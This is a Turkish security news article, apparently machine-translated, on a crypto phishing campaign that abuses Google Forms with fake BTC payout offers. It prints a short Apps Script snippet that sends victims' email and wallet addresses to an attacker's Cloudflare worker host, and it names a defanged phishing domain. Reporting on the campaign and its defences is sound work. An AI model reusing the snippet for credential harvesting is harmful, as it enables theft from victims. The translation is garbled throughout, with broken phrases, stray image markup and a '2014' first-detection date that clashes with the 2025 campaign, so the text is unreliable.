Sürtünmesiz veri toplama için övülen Google Formları, hızla yayılan kripto-akma kampanyası için beklenmedik sahneleme alanı haline geldi.
İlk olarak 2014’ün sonlarında tespit edilen ancak 2. çeyrek 2025’te yükselen ploy, en çok spam ağ geçitlerini kolayca atlayan meşru görünümlü bir form içeren istenmeyen bir e-posta ile başlar.
Açıldıktan sonra, form iyi bilinen bir değişim taklit eder ve alıcıyı “bekleyen 1.275 BTC ödeme” konusunda tebrik eder.
Tek bir tıklama, bir cüzdan adresini “doğrulamaları” ve nominal bir “ağ ücreti” ödemeleri istenen sahte bir para çekme portalını hedefler.
Saniyeler içinde verilen kimlik bilgileri, Cloudflare çalışanlarının arkasına gizlenmiş bir komut ve kontrol (C2) sunucusuna sifonlanır ve herhangi bir ödeme, Mixer cüzdanlarına para yolunu yok ederek ruhludur.
İşlemi olağanüstü kılan, Google Forms Bildirim Motorunun akıllıca kullanılmasıdır.
Her cazibe Google’ın kendi SMTP altyapısından kaynaklandığından, etki alanı tanıtımı kontrolleri neredeyse her zaman temiz sonuçları döndürür ve rakiplere yakın gelen kutu yerleşimi sağlar.
Kaspersky analistleri, Temmuz 2025’in başlarında tüketici uç noktalarının rutin telemetri incelemeleri sırasında Google Forms tabanlı kimlik avı mesajlarında yüzde 63’lük bir artışı gözlemledikten sonra, kampanyayı yılın en etkili düşük teknoloji ürünü sosyal mühendislik saldırılarından biri olarak işaretledikten sonra Spike’ı kaydetti.
Enfeksiyon Mekanizması: Gömülü Webhooks aracılığıyla kimlik bilgisi hasat
Kötü niyetli form, kurbanın formun tamamlanmasını beklemeden “Gönder” i tıkladığı anda verileri sessizce söndüren bir uygulamaların komut dosyasına bağlı bir webhook’tan yararlanır.
Komut dosyası ayrıca bir kerelik bir JavaScript yönlendirme hxxps: // iste-btc-id’e enjekte eder[.]Çevrimiçi, cilalı bir reaksiyon ön ucu barındıran bir klon sitesi ve saldırganın C2’sine her isteği proxy eden bir Python Flask API’si.
Sızan form şablonundan kurtarılan aşağıdaki kesilmiş snippet, exfil rutini vurgular:-
function onFormSubmit(e){
const payload = JSON.stringify({
email: e.namedValues['Email'][0],
wallet: e.namedValues['Wallet Address'][0]
});
UrlFetchApp.fetch('https://worker-cryptodrip.workers.dev/submit', {
method: 'post',
contentType: 'application/json',
payload: payload
});
}.webp){kind=spacer}
Bu, ilk kimlik avı mesajını gösterirken, aşağıdakiler “sahte para çekme portalı” nı sahte ödeme sayfasını yakalar.
.webp)
Azaltma Katmanlı Savunmalara bağlıdır: Google Formları E-postaları açıkça beyaz listelemeyen e-postaları karantina eden içerik-disarm kurallarını uygulayın ve tanıdık olmayan işçi alanlarına giden talepleri engelleyebilen tarayıcı uzantılarını dağıtın.
Son olarak, güvenlik bilinci programları zamansız prensibi tekrarlamalıdır – serbest kripto para birimi asla bir form gönderimi yoluyla gelmez.
Gerçek zamanlı sanal alan analizi ile daha hızlı, daha doğru kimlik avı tespiti ve işletmeniz için gelişmiş koruma deneyimi-> Herhangi birini deneyin. Şimdi